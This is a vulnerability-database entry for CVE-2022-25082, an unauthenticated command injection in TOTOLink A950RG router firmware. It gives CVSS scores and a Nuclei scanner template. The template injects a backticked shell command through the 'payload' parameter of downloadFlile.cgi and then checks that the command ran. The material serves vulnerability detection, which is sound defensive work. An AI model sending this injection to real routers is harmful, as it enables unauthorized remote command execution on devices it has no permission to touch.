Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-25082
HistoryNov 05, 2022 - 12:21 p.m.

TOTOLink - Unauthenticated Command Injection

2022-11-0512:21:49
ProjectDiscovery
github.com
3

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.042 Low

EPSS

Percentile

92.3%

TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
id: CVE-2022-25082

info:
  name: TOTOLink - Unauthenticated Command Injection
  author: gy741
  severity: critical
  description: |
    TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the command injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2022-25082
    - https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25082
    cwe-id: CWE-78
    epss-score: 0.0417
    epss-percentile: 0.92196
    cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: totolink
    product: a950rg_firmware
  tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive
variables:
  cmd: "`ls>../{{randstr}}`"

http:
  - raw:
      - |
        GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /{{randstr}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - .sh
          - .cgi
        condition: and

      - type: word
        part: header_2
        words:
          - application/octet-stream

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f8de283883e3fdfd1e54268406adbc0d6a29efc03623b6530af3ae535d385443022100f0f801a792b1ae39a2af7999cf7a6942f263f25a2b2f3d6786a0cdc1cb223cc6:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.042 Low

EPSS

Percentile

92.3%